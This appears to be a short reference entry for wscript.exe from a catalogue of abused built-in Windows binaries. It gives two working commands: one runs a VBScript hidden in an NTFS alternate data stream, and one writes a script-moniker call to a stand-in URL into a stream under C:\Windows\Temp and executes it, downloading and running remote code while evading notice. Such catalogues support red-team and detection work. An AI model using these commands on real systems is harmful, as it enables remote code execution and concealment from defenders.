Used by Windows to execute scripts
Execute script stored in an alternate data stream
wscript //e:vbscript file.ext:script.vbs
Download and execute script stored in an alternate data stream
echo GetObject("script:https://www.example.org/file.js") > C:\Windows\Temp\file.ext:hi.js && wscript.exe C:\Windows\Temp\file.ext:hi.js